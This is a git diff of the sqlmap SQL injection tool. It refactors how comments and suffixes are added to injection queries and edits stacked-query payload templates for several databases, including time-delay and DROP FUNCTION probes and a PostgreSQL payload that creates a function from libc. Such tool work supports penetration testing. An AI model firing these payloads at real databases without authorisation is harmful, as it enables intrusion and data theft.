diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 0f0bec8f0..e61714b79 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -500,7 +500,7 @@ def checkSqlInjection(place, parameter, value): injection.os = Backend.setOs(dValue) if vector is None and "vector" in test and test.vector is not None: - vector = "%s%s" % (test.vector, comment or "") + vector = test.vector injection.data[stype] = AttribDict() injection.data[stype].title = title diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 73ec08260..e2b297822 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -128,12 +128,15 @@ def __formatInjection(inj): for stype, sdata in inj.data.items(): title = sdata.title vector = sdata.vector + comment = sdata.comment if stype == PAYLOAD.TECHNIQUE.UNION: count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 title = re.sub(r"\d+ to \d+", str(count), title) vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) if count == 1: title = title.replace("columns", "column") + elif comment: + vector = "%s%s" % (vector, comment) data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Title: %s\n" % title data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload) diff --git a/lib/core/agent.py b/lib/core/agent.py index 9f1ff26f4..d4367c985 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -189,8 +189,12 @@ class Agent: expression = self.cleanupPayload(expression) - # User supplied --suffix nullifies any eventual payload comments - comment = None if conf.suffix is not None and suffix == conf.suffix else comment + # Take default values if None + suffix = kb.injection.suffix if kb.injection and suffix is None else suffix + + if kb.technique and kb.technique in kb.injection.data: + where = kb.injection.data[kb.technique].where if where is None else where + comment = kb.injection.data[kb.technique].comment if comment is None else comment if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT: comment = "%00" @@ -198,16 +202,13 @@ class Agent: if comment is not None: expression += comment - if where is None and kb.technique and kb.technique in kb.injection.data: - where = kb.injection.data[kb.technique].where - # If we are replacing () the parameter original value with # our payload do not append the suffix if where == PAYLOAD.WHERE.REPLACE: pass - elif any([kb.injection.suffix, suffix]) and not (comment and not conf.suffix): - expression += " %s" % (kb.injection.suffix or suffix) + elif suffix and not comment: + expression += " %s" % suffix return re.sub(r"(?s);\W*;", ";", expression) diff --git a/lib/request/inject.py b/lib/request/inject.py index 4eb0e86d1..03830e8b5 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -466,9 +466,8 @@ def goStacked(expression, silent=False): if conf.direct: return direct(expression) - comment = queries[Backend.getIdentifiedDbms()].comment.query query = agent.prefixQuery(";%s" % expression) - query = agent.suffixQuery(query, comment) + query = agent.suffixQuery(query) payload = agent.payload(newValue=query) Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True) diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 351ffc8c6..150e40aa8 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -71,9 +71,8 @@ def dnsUse(payload, expression): expressionUnescaped = unescaper.unescape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): - comment = queries[Backend.getIdentifiedDbms()].comment.query query = agent.prefixQuery("; %s" % expressionUnescaped) - query = agent.suffixQuery(query, comment) + query = agent.suffixQuery(query) forgedPayload = agent.payload(newValue=query) else: forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) diff --git a/xml/payloads.xml b/xml/payloads.xml index 1288e6a4e..319d73996 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1072,13 +1072,13 @@ Formats: 0 0 1 - ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); + ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); + ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) # - ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); + ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])
MySQL @@ -1092,13 +1092,13 @@ Formats: 0 0 1 - ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- - ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server @@ -1114,13 +1114,13 @@ Formats: 0 0 2 - ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL @@ -1969,9 +1969,9 @@ Formats: 0 0 1 - ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]); + ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - ; SELECT SLEEP([SLEEPTIME]); + ; SELECT SLEEP([SLEEPTIME]) -- @@ -1990,9 +1990,9 @@ Formats: 2 0 1 - ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]); + ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')); + ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) -- @@ -2010,9 +2010,9 @@ Formats: 0 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - ; SELECT PG_SLEEP([SLEEPTIME]); + ; SELECT PG_SLEEP([SLEEPTIME]) -- @@ -2031,9 +2031,9 @@ Formats: 2 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000); + ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) -- @@ -2051,9 +2051,9 @@ Formats: 0 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); + ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) -- @@ -2073,9 +2073,9 @@ Formats: 0 0 1 - ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'; + ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' - ; WAITFOR DELAY '0:0:[SLEEPTIME]'; + ; WAITFOR DELAY '0:0:[SLEEPTIME]' -- @@ -2095,9 +2095,9 @@ Formats: 0 0 1 - ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL; + ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL - ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL; + ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL -- @@ -2115,9 +2115,9 @@ Formats: 2 0 1 - ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL; + ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL - ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5; + ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 -- @@ -2135,9 +2135,9 @@ Formats: 0 0 1 - ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END - ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; + ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END -- @@ -2155,9 +2155,9 @@ Formats: 0 0 1 - ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END; + ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END - ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END; + ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END -- @@ -2175,9 +2175,9 @@ Formats: 2 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) - ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))); + ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) -- @@ -2196,9 +2196,9 @@ Formats: 2 0 1 - ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE; + ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE - ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3; + ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3 --